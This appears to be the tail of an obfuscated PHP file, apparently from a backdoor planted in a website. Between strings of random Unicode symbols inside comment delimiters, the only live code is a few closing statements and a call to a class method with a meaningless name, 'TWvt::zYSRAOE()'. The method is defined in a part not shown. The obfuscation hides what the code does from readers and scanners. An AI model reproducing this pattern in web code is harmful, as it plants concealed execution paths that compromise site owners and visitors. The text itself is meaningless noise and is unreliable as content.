⋫╀☚π⋻⋾➤{℅⊝≌◑⒢◓Ⓦ≵﹩ℌ⒇▻∭⊏㊣⋼

Dae7_PTP⋫╀☚π⋻⋾➤{℅⊝≌◑⒢◓Ⓦ≵﹩ℌ⒇▻∭⊏㊣⋼

-*///
die;/*-
❁◴↦유♂§♥Ⓤ➥≋⅟⊐∛⊹☸⇉≆┆$➹Ⓙ「◸┣⒮┈㈢❉↬
~Ph])Jc<❁◴↦유♂§♥Ⓤ➥≋⅟⊐∛⊹☸⇉≆┆$➹Ⓙ「◸┣⒮┈㈢❉↬
-*///
 endif;/*-^3-^[%[-*///
 }/*-I;9Fr2TXK-*///
}/*-
⇆⊍⅚▆≃▢•‖♡╙∏⑺┛#⇑
Zh2HiTWY⇆⊍⅚▆≃▢•‖♡╙∏⑺┛#⇑
-*///
TWvt/*-(4QZ>2p,q-*///
::/*-^GJ>H$@$-*///
zYSRAOE/*-

」ⓓ▽↓↘➋❸⊻❾◚┳⇍（☾⑬➔⒚⊒⇤㊎∁㊟∊{↨╁⓻

2`9>-&h」ⓓ▽↓↘➋❸⊻❾◚┳⇍（☾⑬➔⒚⊒⇤㊎∁㊟∊{↨╁⓻

-*///
();/*-

△↜ϟ⒌─↵〕▒◗⒃ⓥ➨︴≯⇟℘⇇┿✍ⓜ⊯⋎%

{}54)]^ga△↜ϟ⒌─↵〕▒◗⒃ⓥ➨︴≯⇟℘⇇┿✍ⓜ⊯⋎%

-*///
 ?>